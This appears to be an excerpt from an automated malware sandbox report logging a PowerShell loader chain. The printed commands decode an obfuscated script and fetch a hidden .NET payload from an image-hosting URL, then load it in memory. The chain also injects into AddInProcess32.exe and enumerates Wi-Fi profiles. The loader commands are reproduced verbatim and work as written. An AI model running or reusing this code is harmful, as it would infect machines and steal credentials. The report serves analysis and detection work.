          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR
          Bypasses PowerShell execution policy
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 410000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 412000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FAE008
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredkdgtreodgtredgtrevdgtreddgtredgtremqdgtrezdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredgdgtremgdgtre4dgtredqdgtremqdgtrezdgtredgdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('runpe.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\c\program files\' , 'aburrar','addinprocess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredkdgtreodgtredgtrevdgtreddgtredgtremqdgtrezdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredgdgtremgdgtre4dgtredqdgtremqdgtrezdgtredgdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('runpe.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\c\program files\' , 'aburrar','addinprocess32',''))} }"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
